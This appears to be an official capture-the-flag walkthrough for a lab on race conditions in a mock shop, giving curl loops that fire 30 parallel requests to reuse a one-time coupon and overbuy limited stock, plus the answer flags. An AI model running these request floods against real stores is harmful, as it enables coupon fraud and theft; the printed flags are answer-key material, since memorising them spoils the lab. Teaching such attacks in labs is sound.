HACKR.GG
hackr.gg — Crapazon — Race Conditions Walkthrough
hackr.gg — Official Walkthrough
Confidential · Educational Use Only

Crapazon — Race Conditions

Race Conditions · Race Condition
Difficulty
Intermediate
Vuln class
Race Condition
Steps
3
// Objective
Exploit race conditions to reuse a one-time coupon and to buy items beyond available stock.
// Tools required
BrowserBurp Suite Intrudercurlffuf
// Step-by-step walkthrough
1
Apply a coupon — once
Add an item to cart and apply the SAVE50 coupon. Note the discount applies correctly the first time.
2
Race the coupon endpoint (Flag 1)
Send 30 concurrent POST requests applying SAVE50 before the server marks it used. Use Burp's "Send group in parallel" feature or curl with &.
Command / Input
for i in $(seq 30); do curl -s -X POST http://TARGET/api/cart/coupon -d '{"code":"SAVE50"}' & done
Output
Multiple responses: {"discount":50,"flag":"HackrGG{r4c3_c0nd1t10n_c0up0n_r3us3d}"}
The flag appears in responses where the coupon was applied multiple times before the lock kicked in.
3
Race the stock check (Flag 2)
Find an item with limited stock (1 unit). Send 30 concurrent buy requests before the stock decrements.
Command / Input
for i in $(seq 30); do curl -s -X POST http://TARGET/api/cart/buy -d '{"item":"laptop-pro"}' & done
Output
HackrGG{r4c3_c0nd1t10n_fr33_1t3m}
When stock goes negative you've triggered the race. The flag appears in the response.
// Flag
Flag value
HackrGG{r4c3_c0nd1t10n_c0up0n_r3us3d}
Flag 1 in the coupon race response; Flag 2 when stock goes negative.
hackr.gg · Cybersecurity Education PlatformEducational use only · Do not distribute